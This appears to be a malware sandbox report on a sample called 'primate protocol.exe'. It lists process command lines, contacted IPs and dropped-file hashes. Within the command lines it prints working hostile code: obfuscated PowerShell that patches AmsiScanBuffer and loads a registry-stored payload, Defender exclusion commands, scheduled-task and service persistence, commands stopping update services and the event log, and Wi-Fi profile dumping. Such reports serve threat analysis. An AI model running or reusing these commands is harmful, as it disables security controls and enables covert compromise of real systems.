C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
C:\Windows\system32\dwm.exe
"dwm.exe"
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netprofm -p -s netprofm
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p
C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
C:\Windows\system32\sihost.exe
sihost.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UdkSvcGroup -s UdkUserSvc
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k osprivacy -p -s camsvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
C:\Windows\system32\SppExtComObj.exe
C:\Windows\system32\SppExtComObj.exe -Embedding
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
C:\Users\Admin\AppData\Local\Temp\primate protocol.exe
"C:\Users\Admin\AppData\Local\Temp\primate protocol.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHUAawBtACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAGUAZQBmACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcASABFAEEARABTAEUAVAAgAE4ATwBUACAARABFAFQARQBDAFQARQBEACcALAAnACcALAAnAE8ASwAnACwAJwBFAHIAcgBvAHIAJwApADwAIwBuAGYAZwAjAD4A"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG0AZwBiACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHoAbgBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAYgBsACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGoAawBmACMAPgA="
C:\Windows\systemprocess.exe
"C:\Windows\systemprocess.exe"
C:\Windows\host.exe
"C:\Windows\host.exe"
C:\Windows\CompPkg.exe
"C:\Windows\CompPkg.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "HOST" /sc ONLOGON /tr "C:\Windows\systemprocess.exe" /rl HIGHEST /f
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /sc minute /mo 1 /tn "CompPkg" /tr "C:\Users\Admin\AppData\Roaming\CompPkg.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\CompPkg.exe
C:\Users\Admin\AppData\Roaming\CompPkg.exe
C:\Users\Admin\AppData\Roaming\CompPkg.exe
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
C:\Windows\SYSTEM32\netsh.exe
"netsh" wlan show profiles
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "$([System.Environment]::GetEnvironmentVariable('SystemDrive'))\"
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop UsoSvc
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop WaaSMedicSvc
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop wuauserv
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop bits
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop dosvc
C:\Windows\system32\dialer.exe
C:\Windows\system32\dialer.exe
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe delete "PROCESS HOST"
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe create "PROCESS HOST" binpath= "C:\ProgramData\czqnicouhgbl\ijujdfuujtjk.exe" start= "auto"
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop eventlog
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe start "PROCESS HOST"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:rWNoSHwYnwkI{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$qNbyexdlHPgKWO,[Parameter(Position=1)][Type]$pGJLtrOUxb)$PTQAtKeJiqS=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+''+[Char](102)+'l'+[Char](101)+''+'c'+''+'t'+'e'+'d'+''+[Char](68)+'e'+[Char](108)+''+'e'+''+[Char](103)+''+'a'+''+[Char](116)+''+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+'n'+'M'+'e'+'m'+''+[Char](111)+'r'+'y'+'M'+'o'+''+'d'+'u'+[Char](108)+''+[Char](101)+'',$False).DefineType(''+[Char](77)+''+[Char](121)+'D'+[Char](101)+''+[Char](108)+'e'+'g'+'ate'+'T'+'y'+[Char](112)+''+[Char](101)+'','C'+[Char](108)+''+[Char](97)+''+'s'+''+'s'+','+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+'i'+''+'c'+','+[Char](83)+''+'e'+'a'+[Char](108)+''+'e'+''+'d'+''+[Char](44)+'An'+[Char](115)+''+[Char](105)+''+[Char](67)+''+[Char](108)+''+[Char](97)+''+'s'+''+'s'+''+[Char](44)+'A'+[Char](117)+''+[Char](116)+'o'+[Char](67)+'l'+'a'+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$PTQAtKeJiqS.DefineConstructor(''+[Char](82)+'T'+[Char](83)+'p'+[Char](101)+''+[Char](99)+'i'+[Char](97)+''+[Char](108)+''+[Char](78)+'a'+'m'+''+[Char](101)+''+[Char](44)+''+[Char](72)+''+[Char](105)+''+[Char](100)+''+[Char](101)+'B'+[Char](121)+''+'S'+''+[Char](105)+''+[Char](103)+''+[Char](44)+''+'P'+''+[Char](117)+''+'b'+'l'+[Char](105)+'c',[Reflection.CallingConventions]::Standard,$qNbyexdlHPgKWO).SetImplementationFlags('R'+[Char](117)+''+[Char](110)+''+'t'+''+'i'+''+'m'+'e'+[Char](44)+''+'M'+''+[Char](97)+'na'+'g'+''+[Char](101)+'d');$PTQAtKeJiqS.DefineMethod('I'+'n'+''+[Char](118)+''+[Char](111)+'k'+'e'+'',''+[Char](80)+''+'u'+''+[Char](98)+''+[Char](108)+''+[Char](105)+'c'+[Char](44)+''+'H'+'i'+'d'+''+[Char](101)+''+[Char](66)+''+[Char](121)+''+[Char](83)+''+[Char](105)+''+[Char](103)+''+[Char](44)+'N'+'e'+''+'w'+''+[Char](83)+'l'+[Char](111)+''+[Char](116)+','+[Char](86)+''+[Char](105)+''+[Char](114)+''+[Char](116)+''+'u'+''+[Char](97)+''+'l'+'',$pGJLtrOUxb,$qNbyexdlHPgKWO).SetImplementationFlags(''+[Char](82)+''+'u'+''+[Char](110)+''+[Char](116)+''+[Char](105)+'m'+[Char](101)+''+[Char](44)+''+[Char](77)+''+[Char](97)+''+[Char](110)+'a'+[Char](103)+'e'+[Char](100)+'');Write-Output $PTQAtKeJiqS.CreateType();}$uCYewRMsqHnJv=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+'s'+''+[Char](116)+''+'e'+''+[Char](109)+''+[Char](46)+''+'d'+''+'l'+''+[Char](108)+'')}).GetType('M'+'i'+''+'c'+'ro'+'s'+''+'o'+''+[Char](102)+''+[Char](116)+''+'.'+''+[Char](87)+''+[Char](105)+'n'+[Char](51)+'2.Un'+'s'+'a'+[Char](102)+''+'e'+''+'N'+'a'+[Char](116)+'iv'+[Char](101)+''+[Char](77)+''+'e'+''+[Char](116)+''+'h'+'od'+'s'+'');$IRRkTkPWrSBpRK=$uCYewRMsqHnJv.GetMethod(''+[Char](71)+'etP'+[Char](114)+''+[Char](111)+''+'c'+'A'+[Char](100)+''+[Char](100)+''+[Char](114)+''+'e'+''+[Char](115)+''+'s'+'',[Reflection.BindingFlags](''+[Char](80)+'ub'+[Char](108)+'ic'+','+''+'S'+''+[Char](116)+''+'a'+''+[Char](116)+'i'+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$jPtdBsPkTWyCVjbdkiF=rWNoSHwYnwkI @([String])([IntPtr]);$ttwoMDhqFKncjBHCysbhgm=rWNoSHwYnwkI @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$joJWgnTTDmi=$uCYewRMsqHnJv.GetMethod(''+[Char](71)+''+'e'+''+'t'+'M'+[Char](111)+''+[Char](100)+'u'+'l'+'e'+[Char](72)+''+[Char](97)+''+[Char](110)+''+[Char](100)+''+'l'+'e').Invoke($Null,@([Object](''+'k'+''+[Char](101)+''+[Char](114)+'n'+[Char](101)+''+[Char](108)+''+'3'+''+[Char](50)+'.'+'d'+''+[Char](108)+''+[Char](108)+'')));$gaQMctFYLwqKhG=$IRRkTkPWrSBpRK.Invoke($Null,@([Object]$joJWgnTTDmi,[Object](''+[Char](76)+''+'o'+''+[Char](97)+'d'+[Char](76)+''+[Char](105)+'br'+[Char](97)+'r'+[Char](121)+''+[Char](65)+'')));$qxJzCAuMKBcmkjfBg=$IRRkTkPWrSBpRK.Invoke($Null,@([Object]$joJWgnTTDmi,[Object]('Vi'+[Char](114)+''+[Char](116)+''+[Char](117)+''+[Char](97)+''+'l'+'P'+[Char](114)+''+[Char](111)+'t'+[Char](101)+''+[Char](99)+'t')));$ElhYZqC=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($gaQMctFYLwqKhG,$jPtdBsPkTWyCVjbdkiF).Invoke(''+'a'+'m'+[Char](115)+''+[Char](105)+'.dl'+[Char](108)+'');$BdgjQiKwxREMtcYjP=$IRRkTkPWrSBpRK.Invoke($Null,@([Object]$ElhYZqC,[Object](''+'A'+'ms'+'i'+''+'S'+'c'+[Char](97)+''+[Char](110)+''+'B'+'u'+'f'+''+[Char](102)+''+[Char](101)+''+[Char](114)+'')));$RBsNwuxrLP=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($qxJzCAuMKBcmkjfBg,$ttwoMDhqFKncjBHCysbhgm).Invoke($BdgjQiKwxREMtcYjP,[uint32]8,4,[ref]$RBsNwuxrLP);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$BdgjQiKwxREMtcYjP,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($qxJzCAuMKBcmkjfBg,$ttwoMDhqFKncjBHCysbhgm).Invoke($BdgjQiKwxREMtcYjP,[uint32]8,0x20,[ref]$RBsNwuxrLP);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SO'+[Char](70)+''+[Char](84)+''+[Char](87)+''+[Char](65)+''+[Char](82)+''+[Char](69)+'').GetValue(''+[Char](100)+''+[Char](105)+''+[Char](97)+''+[Char](108)+''+'e'+'rs'+[Char](116)+'ag'+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"
C:\ProgramData\czqnicouhgbl\ijujdfuujtjk.exe
C:\ProgramData\czqnicouhgbl\ijujdfuujtjk.exe
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop UsoSvc
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop WaaSMedicSvc
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop wuauserv
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop bits
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop dosvc
C:\Windows\system32\dialer.exe
C:\Windows\system32\dialer.exe
C:\Windows\system32\dialer.exe
C:\Windows\system32\dialer.exe
C:\Windows\system32\dialer.exe
dialer.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:OGmlLWAVqpge{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$TsNhdFnLxjfEog,[Parameter(Position=1)][Type]$jyDNPwBZvD)$oNgAvRiMVzR=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('Re'+[Char](102)+'l'+[Char](101)+''+'c'+'t'+'e'+''+'d'+''+[Char](68)+''+[Char](101)+''+'l'+''+'e'+''+[Char](103)+'at'+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+'n'+''+'M'+'e'+[Char](109)+'o'+[Char](114)+''+[Char](121)+''+[Char](77)+''+[Char](111)+''+[Char](100)+''+[Char](117)+''+[Char](108)+''+[Char](101)+'',$False).DefineType(''+'M'+''+'y'+''+[Char](68)+''+'e'+'l'+[Char](101)+''+[Char](103)+''+'a'+'t'+[Char](101)+'T'+'y'+''+[Char](112)+''+[Char](101)+'','Cl'+[Char](97)+''+'s'+'s'+[Char](44)+'P'+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+''+[Char](44)+''+'S'+''+'e'+''+'a'+'le'+[Char](100)+''+','+'A'+'n'+'s'+[Char](105)+'C'+'l'+''+'a'+''+[Char](115)+''+'s'+''+[Char](44)+''+[Char](65)+''+'u'+''+[Char](116)+''+[Char](111)+''+[Char](67)+''+[Char](108)+''+'a'+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$oNgAvRiMVzR.DefineConstructor(''+[Char](82)+''+[Char](84)+''+[Char](83)+''+[Char](112)+''+[Char](101)+''+[Char](99)+''+[Char](105)+''+[Char](97)+''+[Char](108)+''+[Char](78)+''+[Char](97)+''+'m'+'e'+[Char](44)+''+[Char](72)+''+'i'+''+[Char](100)+'e'+'B'+''+[Char](121)+'S'+[Char](105)+''+'g'+''+','+''+'P'+'u'+[Char](98)+''+'l'+''+'i'+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$TsNhdFnLxjfEog).SetImplementationFlags(''+[Char](82)+'un'+[Char](116)+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](77)+''+[Char](97)+''+[Char](110)+''+'a'+'g'+'e'+'d');$oNgAvRiMVzR.DefineMethod('I'+'n'+''+'v'+'ok'+'e'+'',''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+'c'+''+[Char](44)+''+[Char](72)+''+[Char](105)+''+'d'+''+[Char](101)+''+[Char](66)+''+'y'+''+[Char](83)+''+'i'+'g'+[Char](44)+'N'+[Char](101)+''+[Char](119)+'S'+[Char](108)+''+'o'+''+'t'+','+[Char](86)+'ir'+'t'+'u'+[Char](97)+''+[Char](108)+'',$jyDNPwBZvD,$TsNhdFnLxjfEog).SetImplementationFlags(''+[Char](82)+''+[Char](117)+'n'+[Char](116)+''+[Char](105)+'m'+[Char](101)+''+[Char](44)+''+'M'+''+[Char](97)+''+[Char](110)+''+[Char](97)+''+'g'+''+[Char](101)+''+'d'+'');Write-Output $oNgAvRiMVzR.CreateType();}$gfxDMLZvsoWkp=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+[Char](121)+''+[Char](115)+''+[Char](116)+'e'+[Char](109)+''+[Char](46)+''+[Char](100)+''+'l'+'l')}).GetType(''+'M'+'i'+[Char](99)+''+[Char](114)+''+[Char](111)+'s'+[Char](111)+''+[Char](102)+''+[Char](116)+''+'.'+'W'+[Char](105)+''+[Char](110)+''+'3'+''+[Char](50)+''+'.'+''+[Char](85)+''+[Char](110)+'s'+'a'+''+[Char](102)+''+[Char](101)+''+[Char](78)+'a'+'t'+''+[Char](105)+''+[Char](118)+'e'+[Char](77)+'e'+[Char](116)+'h'+[Char](111)+''+[Char](100)+'s');$aUnKfREvwPIzwM=$gfxDMLZvsoWkp.GetMethod(''+[Char](71)+''+[Char](101)+'t'+[Char](80)+''+[Char](114)+'o'+[Char](99)+''+[Char](65)+''+[Char](100)+'d'+[Char](114)+'es'+'s'+'',[Reflection.BindingFlags]('P'+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+''+','+''+[Char](83)+''+[Char](116)+''+'a'+''+[Char](116)+''+[Char](105)+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$HFxtNqoXAbLcrxCPVFX=OGmlLWAVqpge @([String])([IntPtr]);$qtIpSTWHCzQzpOeBuGGPuN=OGmlLWAVqpge @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$fLxLQMkrzuH=$gfxDMLZvsoWkp.GetMethod(''+[Char](71)+''+'e'+'tMo'+[Char](100)+'u'+[Char](108)+''+'e'+'H'+[Char](97)+''+[Char](110)+''+'d'+''+[Char](108)+'e').Invoke($Null,@([Object](''+'k'+''+'e'+''+[Char](114)+''+[Char](110)+''+'e'+''+'l'+''+[Char](51)+''+[Char](50)+'.'+[Char](100)+'ll')));$EmGnHNgYXIcANx=$aUnKfREvwPIzwM.Invoke($Null,@([Object]$fLxLQMkrzuH,[Object](''+[Char](76)+''+[Char](111)+''+[Char](97)+''+[Char](100)+''+[Char](76)+''+[Char](105)+''+[Char](98)+''+[Char](114)+''+'a'+''+[Char](114)+''+[Char](121)+''+'A'+'')));$wdEPlweooazpnKfOR=$aUnKfREvwPIzwM.Invoke($Null,@([Object]$fLxLQMkrzuH,[Object](''+'V'+''+[Char](105)+''+[Char](114)+'t'+'u'+''+[Char](97)+'l'+'P'+''+'r'+''+[Char](111)+'t'+[Char](101)+''+[Char](99)+'t')));$ttOjfWX=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($EmGnHNgYXIcANx,$HFxtNqoXAbLcrxCPVFX).Invoke('a'+'m'+''+[Char](115)+''+[Char](105)+''+[Char](46)+''+'d'+''+[Char](108)+''+[Char](108)+'');$cvXVWYJuPXJOoVoRH=$aUnKfREvwPIzwM.Invoke($Null,@([Object]$ttOjfWX,[Object]('Am'+[Char](115)+''+[Char](105)+'S'+[Char](99)+'a'+[Char](110)+''+[Char](66)+''+[Char](117)+''+[Char](102)+'f'+'e'+''+'r'+'')));$FcgrhMHjCI=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($wdEPlweooazpnKfOR,$qtIpSTWHCzQzpOeBuGGPuN).Invoke($cvXVWYJuPXJOoVoRH,[uint32]8,4,[ref]$FcgrhMHjCI);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$cvXVWYJuPXJOoVoRH,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($wdEPlweooazpnKfOR,$qtIpSTWHCzQzpOeBuGGPuN).Invoke($cvXVWYJuPXJOoVoRH,[uint32]8,0x20,[ref]$FcgrhMHjCI);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+'O'+'F'+[Char](84)+'WAR'+[Char](69)+'').GetValue('di'+[Char](97)+'l'+[Char](101)+''+[Char](114)+''+[Char](115)+''+'t'+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{09f4a227-cef4-4b5d-ba7b-580721731d4e}
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{c3f2fd93-4d00-463c-bd0a-7536c6c18483}
C:\Users\Admin\AppData\Roaming\CompPkg.exe
C:\Users\Admin\AppData\Roaming\CompPkg.exe
C:\Users\Admin\AppData\Roaming\CompPkg.exe
C:\Users\Admin\AppData\Roaming\CompPkg.exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | appengine.google.com | udp |
| US | 174.61.118.194:4872 | tcp | |
| DE | 195.201.57.90:443 | ipwho.is | tcp |
| US | 73.179.34.234:4872 | tcp | |
| US | 174.61.118.194:4872 | tcp |
Files
C:\Windows\systemprocess.exe
| MD5 | b5e966fbfca567c51d5da8b2106a48e5 |
| SHA1 | 164ace9df43f1a760c1205f82c9cc4eb1dfee991 |
| SHA256 | 30e97b3c23a562d5ea0b8605ded5a5b22529defc42c1a420dfbb3e42007910c8 |
| SHA512 | 9169eaab184c2412dc469cee331efca0b17ed4efa8ec791d1c3320b7914a2132dba76dccf7700cbe1084c2ab00e3e4bec277564bdb0a9f2e9739e559109bc534 |
memory/5768-14-0x00007FF973103000-0x00007FF973105000-memory.dmp
C:\Windows\host.exe
| MD5 | 1cf0ec247776f6817231070a2f75994c |
| SHA1 | 3253eccccece8243d11975e7021569251def8f2f |
| SHA256 | e867dd037f2f1d8a36c6a0d3972ddd027f9536838e92d6aa911a60f47cf2f051 |
| SHA512 | f2c011d2dcb2eb5efea73c89fdd5c99534f5956485a982329de39361db2cda92ccbed4d38860b767c2149b78e8ba7ed8117793955e60a773bc8c05937112be90 |
memory/5768-29-0x0000018E2D8D0000-0x0000018E2DA62000-memory.dmp
C:\Windows\CompPkg.exe
| MD5 | 39ba631f3e54a2c480e7c83e5e6d14ff |
| SHA1 | 82f3e3f1faf9d879a37e473a81cb5d32672af099 |
| SHA256 | 3dd90786fa7eb27ec458cd54b83801027490cb39f6f570f4779ab63b54504d64 |
| SHA512 | 0c5bb9e46a54343aa0c3a46367ff9216472598d1cfd854003da5e782e8be485622cfce6a1912d54c4dce348d4824b3009ecde4ecf5be0d89baa500fb63ff9c16 |
memory/3076-32-0x0000000000F10000-0x0000000000F7A000-memory.dmp
memory/5768-33-0x0000018E2DF30000-0x0000018E2DF4C000-memory.dmp
memory/2660-34-0x0000000004E70000-0x0000000004EA6000-memory.dmp
memory/2660-36-0x0000000005660000-0x0000000005C8A000-memory.dmp
memory/5768-35-0x00007FF973100000-0x00007FF973BC2000-memory.dmp
memory/2660-37-0x0000000005370000-0x0000000005392000-memory.dmp
memory/1444-38-0x0000000004FD0000-0x0000000005036000-memory.dmp
memory/1444-39-0x00000000050B0000-0x0000000005116000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_iad1besm.ot2.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/1444-48-0x0000000005770000-0x0000000005AC7000-memory.dmp
memory/1444-57-0x0000000005BF0000-0x0000000005C0E000-memory.dmp
memory/1444-58-0x0000000005F50000-0x0000000005F9C000-memory.dmp
memory/5768-64-0x0000018E48050000-0x0000018E480A0000-memory.dmp
memory/5768-63-0x0000018E47FC0000-0x0000018E47FFA000-memory.dmp
memory/5768-66-0x0000018E48000000-0x0000018E4804E000-memory.dmp
memory/5768-65-0x0000018E48560000-0x0000018E48612000-memory.dmp
memory/5768-67-0x0000018E484A0000-0x0000018E484EC000-memory.dmp
memory/5768-62-0x0000018E2F7B0000-0x0000018E2F7C2000-memory.dmp
memory/5768-69-0x0000018E48620000-0x0000018E4864A000-memory.dmp
memory/5768-68-0x0000018E484F0000-0x0000018E4853A000-memory.dmp
memory/2660-70-0x0000000007960000-0x0000000007FDA000-memory.dmp
memory/2660-71-0x00000000067D0000-0x00000000067EA000-memory.dmp
memory/1444-73-0x0000000070E90000-0x0000000070EDC000-memory.dmp
memory/1444-72-0x00000000061A0000-0x00000000061D4000-memory.dmp
memory/1444-82-0x0000000006230000-0x000000000624E000-memory.dmp
memory/1444-83-0x0000000006BF0000-0x0000000006C94000-memory.dmp
